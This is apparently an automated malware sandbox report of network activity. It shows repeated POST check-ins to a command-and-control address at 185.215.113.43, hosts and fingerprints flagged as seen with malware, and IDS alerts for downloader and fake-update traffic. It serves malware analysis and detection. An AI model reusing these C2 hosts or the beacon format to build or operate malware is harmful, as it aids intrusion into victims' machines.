Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox View IP Address: 34.117.188.166 34.117.188.166
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49790 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49807 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49810 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49814 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49822 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49828 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49836 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49837 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49843 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49847 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49857 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49859 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49862 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49875 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49878 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49885 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49887 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49888 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49900 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49913 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49917 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49850 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49939 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49945 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49951 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49955 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49931 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49980 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49990 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50005 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50014 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50231 -> 20.189.173.15:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50196 -> 20.189.173.20:443
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uMudn9COvFFTZ92&MD=6mTV+hOs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uMudn9COvFFTZ92&MD=6mTV+hOs HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
